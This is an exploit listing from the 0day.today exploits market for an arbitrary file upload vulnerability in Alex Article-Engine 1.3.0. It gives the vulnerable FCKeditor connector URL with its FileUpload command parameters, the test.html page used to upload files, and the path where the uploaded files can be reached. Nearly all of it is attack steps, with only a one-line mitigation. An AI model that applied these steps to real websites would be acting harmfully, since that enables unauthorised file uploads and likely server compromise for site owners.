[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability

Author
Batter
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4204
Category
web applications
Date add
19-11-2008
Platform
unsorted
=========================================================================
Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability
=========================================================================


########################################################################
#
#                        Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################



####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?

Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- how To use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources.

####################




#  0day.today [2024-12-25]  #